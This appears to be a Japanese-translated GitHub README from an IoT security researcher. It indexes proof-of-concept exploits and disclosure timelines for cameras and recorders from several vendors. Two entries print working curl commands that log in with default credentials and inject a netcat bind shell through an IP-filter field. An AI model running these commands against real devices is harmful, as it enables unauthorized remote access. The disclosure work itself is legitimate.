
これらのPoCは単なるPoCであり、パブリックドメインでサポートされていないため、Issueは無効になっています。
雑多な PoC - (イン)セキュリティなモノのインターネット
これらの粗末な (イン)セキュリティ製品について読む価値があります: https://ipvm.com/reports/security-exploits
2021-10-19
すべてのクレジットは Watchful_IP (https://watchfulip.github.io/) に帰属します
https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py
2021-10-06
詳細: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt
PoC: https://github.com/mcw0/DahuaConsole
2021-09-06
2 つの独立した認証バイパス。
再び「Dahua の大規模ハッキング」が発生する可能性が非常に高いため、Full Disclosure の詳細は 2021 年 10 月 6 日まで公開を保留します。
それまでの間、ファームウェアのアップグレードを強く推奨します。
https://www.dahuasecurity.com/support/cybersecurity/details/957
2020-05-09
https://github.com/mcw0/PoC/blob/master/Dahua-3DES-IMOU-PoC.py
2020-02-29
https://github.com/mcw0/Tools/blob/master/Dahua-JSON-Debug-Console-v2.py
2020-02-15
今週 Dahua PSIRT との連絡が確立し、23 の異なるクラウドサプライヤーに関する詳細、PoC、証拠を提供しました。また、Google Zero の新しい試み『Policy and Disclosure: 2020 Edition』(私にとって理にかなっているため) にも従います。つまり、Dahua が 09.05.2020 19:00 UTC (May 9, 2020 19:00 UTC) より前に更新プログラムをリリースするか後になるかに関係なく、90 日後に公開します。
Dahua さん、この日までに修正して更新プログラムを提供してください...
参照: Google Zero『Policy and Disclosure: 2020 Edition』: https://googleprojectzero.blogspot.com/2020/01/policy-and-disclosure-2020-edition.html
2020-02-10
Dahua SDK からの認証情報漏えい (最終的に平文になる) を Dahua PSIRT に開示したばかりです。彼らがこの情報をどう受け止めるか見てみましょう。20 を超える異なるクラウドプロバイダーが関与しているのはかなり悪い状況です... 今日から 90 日間のカウントダウンが始まります。
2020-01-20
いくつかのツールを公開する予定の新しいリポジトリを作成しました。
最初の公開: Dahua-JSON-Debug-Console-v2.py
2019-10-06 (古いもの)
Axis デバイスのモデルとファームウェアバージョンを匿名で検出 (1998 - 2019)。
https://github.com/mcw0/PoC/blob/master/axis-detect.py
2019-08-20
https://github.com/mcw0/PoC/blob/master/Realtek-RTL83xx-PoC.py
2019-08-06
https://www.vdoo.com/blog/disclosing-significant-vulnerabilities-network-switches
すべての技術詳細と Python PoC は 2019 年 8 月 20 日にここに投稿されます。
2019-05-15
複数のスタックオーバーフロー、RCE、ユーザー名/パスワードの平文での漏えいなど
https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py
2019-04-10
このスクリプトは、通常の HTTP/HTTPS ポートと TCP/5000 で動作する Dahua の「DHIP」P2P バイナリプロトコルを使用します。
JSON を使用して Dahua デバイスの内部「デバッグコンソール」に接続します (以前の TCP/6789 でのデバッグと同じタイプ)。
https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py
楽しんでください、bashis
2019-01-23
ご無沙汰しています、長い間公開していませんでした...
私はまだ活動して研究を続けていますが、ニュースとしては、ベンダー管理のために VDOO (https://www.vdoo.com/) とも協力しようとしており、そのため残念ながら Full Disclosure のプロセスがやや遅れています...
とにかく、私の GitHub で Full Disclosure としていくつかの興味深い研究が公開される予定です。
VDOO との協力により、私は自分の好きな仕事に取り組むことができ、(望まない | 理解しない | 無視したい | 遅らせたい | どうでもいい) といったベンダーに時間を無駄にしなくて済みます。
最新は Reolink (https://reolink.com/) 関連のもので、こちらにあります: https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/.
2018-06-18
AVTECH {DVR/NVR/IPC} ヒープオーバーフロー、IPCP API、RCE
https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt
https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py
2018-06-03
Reolink {IPC} RCE (認証済み)
https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py
2018-04-09
Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py
2018-03-05
AVTECH {DVR/NVR/IPC} 認証済み RCE
https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py
2018-02-01
Geovision Inc. IP カメラ/ビデオ/アクセス制御 複数のリモートコマンド実行 - 複数のスタックオーバーフロー - ダブルフリー - 不正アクセス https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt
Geovision Inc. IP カメラ & ビデオサーバー リモートコマンド実行 PoC https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py
2018-01-22
telnetd の有効化を許可するため、TCP/787 で動作する Herospeed TelnetSwitch デーモン。 小さなスタックオーバーフローにより、動的に生成されたパスワードを上書きして telnetd を有効化できます。 https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py
2018-01-15
Foscam IPC ファームウェアイメージに対してさまざまな暗号鍵/ダイジェストと暗号をループ処理する小さな OpenSSL ラッパー。 https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py
雑多な Foscam IPC バイナリとライブラリ内の文字列/ログイン/パスワード/暗号鍵を難読化解除 https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py
2017-12-22
https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt
2017-12-14
https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt
2017-12-05
https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c
2017-12-03
// Enable 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// Add to 'IP Filter' and execute
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// Disable 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// Remove from 'IP Filter'
curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
2017-12-03
// Enable 'IP Filter'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"
// Add to 'IP Filter' and execute
curl --user admin:admin -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
// Disable 'IP Filter'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"
// Remove from 'IP Filter'
curl --user admin:admin -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"
注: 同じものを共有する他の OEM もかなり確実に存在します。
2017-12-01 Axis Communications MPQT/PACS ヒープオーバーフローと情報漏えい https://github.com/mcw0/PoC/blob/master/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt
2017-11-13 リバース stunnel TLSv1 プライバシーシェル https://github.com/mcw0/PoC/blob/master/Reverse%20stunnel%20TLSv1%20privacy%20shell.txt
2017-11-13 Vivotek IP カメラ - リモートスタックオーバーフロー https://github.com/mcw0/PoC/blob/master/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt
2017-10-29 Uniview RCE と設定エクスポート PoC https://github.com/mcw0/PoC/blob/master/Uniview%20RCE%20PoC.txt